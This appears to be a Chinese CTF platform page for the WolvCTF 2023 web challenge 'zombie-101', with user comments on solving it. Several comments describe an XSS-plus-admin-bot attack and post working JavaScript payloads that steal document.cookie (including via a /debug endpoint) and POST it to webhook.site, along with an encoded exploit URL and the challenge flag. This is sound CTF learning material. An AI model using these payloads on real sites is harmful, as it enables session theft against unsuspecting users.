zombie-101WEB 未解决

分数: 0 金币: 0
所属赛事: WolvCTF 2023
题目作者: 未知
一  血: Max_yiz
一血奖励: 0金币
解  决: 368
提  示:
描  述:
wctf{}
评论
songyu0452 2天前

这是经典的 XSS + Admin Bot 模式:flag 藏在 admin bot 的 cookie 里,需要让 bot 访问我们的 XSS 页面,在 bot 的浏览器上下文中执行 JS 窃取 document.cookie 并外带。

回复 0

保护级废物0.o 4月前

发现XSS漏洞 - /zombie?show= 参数未过滤,可注入JavaScript 发现SSRF - /visit 让admin bot访问指定URL(限hostname为49.232.142.230) 发现Debug端点 - /debug 返回请求头信息(含cookie) 构造XSS payload - 让admin bot访问含XSS的页面:

回复 1

倦鸟叫了一整天 1年前

看不到源码呀

回复 1
18715082837 11月前

怎么看源码

回复 1

15756309355 2年前

斯,为什么我服务器接受不到cookie的请求,网站根本没有访问我服务器

回复 0
林蔓露 9月前

@yearling 管理员cookie:Wow, we really liked too!

回复 0

lianglllllll 1年前

这个要自己搭吗?之前有道题也是没有

回复 0

lunarbyside 1年前

@yearling 会不会是因为网络是私网地址啊

回复 0

yearling 2年前

我也拿不到cookie,难绷

回复 0

missa 2年前

请问有什么推荐的xss平台吗?网上找的没有用,自己本机去访问都收不到信息,

回复 0
vincentshine 1年前

任何一个带外网站都可以,推荐ceye

回复 0

一只小羊 2年前

<script>fetch('https://webhook.site/aa6a0e67-0dcc-4c44-94cd-ec7c8960b235',{method:'POST',body:document.cookie})</script>

回复 0
lunarbyside 1年前

接收到请求了,但是没搞懂cookie在哪里,然后干嘛呢也不知道,也没看到cookie

回复 1

vincentshine 1年前

感谢老哥的脚本,我用其他的windows.location.href的方式打不开

回复 0

1512624649 2年前

flag=wctf{c14551c-4dm1n-807-ch41-n1c3-j08-93261} http://82.157.146.43:14179/visit?url=http%3A%2F%2F82.157.146.43%3A14179%2Fzombie%3Fshow%3D%253Cscript%253Efetch%2528%2527%252Fdebug%2527%2529.then%252

回复 2

.⎛⎝•̀ω•́⎠⎞. 2年前

典型的xss盗管理员cookie,网上随便找一个xss平台,或者自己用服务器建一个

回复 0

meilanzhuju 2年前

有点晕乎

回复 0

qingfeng1115 2年前

<script>fetch('/debug').then(r=>r.json()).then(j=>fetch('https://webhook.site/8ab574ff-b363-48a3-a1b3-4455a3001925',{method:'POST',body:j.cookie}))</script> 中https://webhook.site/8a

回复 0

WriteUp

image
a2cai

3 金币

评分(0)

暂无评分

解题动态

12345678! 攻破了该题 21小时前
Kevin026 攻破了该题 1天前
风花雪月 攻破了该题 1天前
songyu0452 攻破了该题 2天前
sin 攻破了该题 4天前
扫地老林 攻破了该题 5天前
Zfc 攻破了该题 6天前
晨曦静夜 攻破了该题 6天前
bugbiubiubiu 攻破了该题 6天前
nnyylove 攻破了该题 8天前
Jazzyl 攻破了该题 10天前
wzdhsgfagjf 攻破了该题 11天前
dddddddwww 攻破了该题 11天前
jiejie001 攻破了该题 14天前
东风遥 攻破了该题 15天前
userxin 攻破了该题 16天前
低调申 攻破了该题 17天前
llawlietD 攻破了该题 20天前
hky 攻破了该题 24天前
Vluae 攻破了该题 1月前
问题反馈